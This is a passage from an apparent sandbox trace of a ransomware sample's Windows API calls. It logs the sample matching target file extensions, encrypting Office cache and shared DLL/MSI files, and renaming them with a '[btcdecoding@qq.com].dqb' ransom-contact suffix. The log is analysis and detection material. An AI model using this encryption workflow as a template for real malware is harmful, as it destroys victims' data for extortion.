(lpString=".jpg") returned 4 [0048.846] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.846] lstrlenW (lpString=".doc") returned 4 [0048.846] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.846] lstrlenW (lpString=".docx") returned 5 [0048.846] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.846] lstrlenW (lpString=".pdf") returned 4 [0048.846] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.846] lstrlenW (lpString=".xls") returned 4 [0048.846] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.846] lstrlenW (lpString=".xlsx") returned 5 [0048.846] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.846] lstrlenW (lpString=".ppt") returned 4 [0048.847] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.847] lstrlenW (lpString=".zip") returned 4 [0048.847] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.847] lstrlenW (lpString=".rar") returned 4 [0048.847] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.847] lstrlenW (lpString=".bz2") returned 4 [0048.847] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.847] lstrlenW (lpString=".7z") returned 3 [0048.847] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.847] lstrlenW (lpString=".dbf") returned 4 [0048.847] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.847] lstrlenW (lpString=".1cd") returned 4 [0048.847] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.847] lstrlenW (lpString=".jpg") returned 4 [0048.847] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.847] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0048.847] lstrlenW (lpString="PidGenX.dll") returned 11 [0048.847] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0048.847] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1463568) returned 1 [0048.847] CloseHandle (hObject=0x1dc) returned 1 [0048.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0048.848] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0048.848] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.848] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.848] GetLastError () returned 0x0 [0048.848] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.873] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0049.109] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x65520, lpOverlapped=0x0) returned 1 [0049.122] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0049.230] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.230] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.231] SetEndOfFile (hFile=0x214) returned 1 [0049.393] CloseHandle (hObject=0x214) returned 1 [0049.394] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.394] SetEndOfFile (hFile=0x1dc) returned 1 [0049.397] CloseHandle (hObject=0x1dc) returned 1 [0049.398] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0049.398] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0050.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.273] lstrlenW (lpString=".doc") returned 4 [0050.273] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString=".docx") returned 5 [0050.273] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.273] lstrlenW (lpString=".pdf") returned 4 [0050.273] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString=".xls") returned 4 [0050.273] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString=".xlsx") returned 5 [0050.273] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.273] lstrlenW (lpString=".ppt") returned 4 [0050.273] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.273] lstrlenW (lpString=".zip") returned 4 [0050.273] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString=".rar") returned 4 [0050.273] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.273] lstrlenW (lpString=".bz2") returned 4 [0050.273] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.274] lstrlenW (lpString=".7z") returned 3 [0050.274] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString=".dbf") returned 4 [0050.274] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString=".1cd") returned 4 [0050.274] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString=".jpg") returned 4 [0050.274] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString=".doc") returned 4 [0050.274] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString=".docx") returned 5 [0050.274] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.274] lstrlenW (lpString=".pdf") returned 4 [0050.274] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString=".xls") returned 4 [0050.274] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString=".xlsx") returned 5 [0050.274] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.274] lstrlenW (lpString=".ppt") returned 4 [0050.274] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.274] lstrlenW (lpString=".zip") returned 4 [0050.274] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString=".rar") returned 4 [0050.274] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.274] lstrlenW (lpString=".bz2") returned 4 [0050.274] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.274] lstrlenW (lpString=".7z") returned 3 [0050.274] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.275] lstrlenW (lpString=".dbf") returned 4 [0050.275] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.275] lstrlenW (lpString=".1cd") returned 4 [0050.275] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.275] lstrlenW (lpString=".jpg") returned 4 [0050.275] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.275] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0050.275] lstrlenW (lpString="VisiorWW.msi") returned 12 [0050.275] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0050.627] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=12060672) returned 1 [0050.627] CloseHandle (hObject=0x1e4) returned 1 [0050.627] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0050.628] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.628] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0050.628] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0050.628] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.628] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.628] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.633] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.633] ReadFile (in: hFile=0x1e4, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.642] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.642] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.642] ReadFile (in: hFile=0x1e4, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.657] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.657] WriteFile (in: hFile=0x1e4, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0051.135] SetEndOfFile (hFile=0x1e4) returned 1 [0051.136] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0051.140] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.140] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.141] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.141] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.147] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.147] WriteFile (in: hFile=0x1e4, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.149] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0051.149] CloseHandle (hObject=0x1e4) returned 1 [0051.149] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0051.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.149] lstrlenW (lpString=".doc") returned 4 [0051.149] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.149] lstrlenW (lpString=".docx") returned 5 [0051.149] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.149] lstrlenW (lpString=".pdf") returned 4 [0051.149] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.149] lstrlenW (lpString=".xls") returned 4 [0051.149] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.149] lstrlenW (lpString=".xlsx") returned 5 [0051.149] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.149] lstrlenW (lpString=".ppt") returned 4 [0051.149] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.149] lstrlenW (lpString=".zip") returned 4 [0051.149] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString=".rar") returned 4 [0051.150] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString=".bz2") returned 4 [0051.150] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.150] lstrlenW (lpString=".7z") returned 3 [0051.150] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString=".dbf") returned 4 [0051.150] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString=".1cd") returned 4 [0051.150] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString=".jpg") returned 4 [0051.150] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString=".doc") returned 4 [0051.150] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.150] lstrlenW (lpString=".docx") returned 5 [0051.150] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.150] lstrlenW (lpString=".pdf") returned 4 [0051.150] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString=".xls") returned 4 [0051.150] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString=".xlsx") returned 5 [0051.150] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.150] lstrlenW (lpString=".ppt") returned 4 [0051.150] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.150] lstrlenW (lpString=".zip") returned 4 [0051.150] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.150] lstrlenW (lpString=".rar") returned 4 [0051.151] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.151] lstrlenW (lpString=".bz2") returned 4 [0051.151] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.151] lstrlenW (lpString=".7z") returned 3 [0051.151] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.151] lstrlenW (lpString=".dbf") returned 4 [0051.151] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.151] lstrlenW (lpString=".1cd") returned 4 [0051.151] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0051.151] lstrlenW (lpString=".jpg") returned 4 [0051.151] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.151] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0051.151] lstrlenW (lpString="EEINTL.DLL") returned 10 [0051.151] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0051.152] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=64096) returned 1 [0051.152] CloseHandle (hObject=0x1e4) returned 1 [0051.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20 [0051.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0051.153] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.153] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.154] GetLastError () returned 0x0 [0051.154] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xfa60, lpOverlapped=0x0) returned 1 [0051.157] WriteFile (in: hFile=0x204, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xfa70, lpOverlapped=0x0) returned 1 [0051.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.159] WriteFile (in: hFile=0x204, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0051.159] SetEndOfFile (hFile=0x204) returned 1 [0051.159] CloseHandle (hObject=0x204) returned 1 [0051.159] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.159] SetEndOfFile (hFile=0x1e4) returned 1 [0051.160] CloseHandle (hObject=0x1e4) returned 1 [0051.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 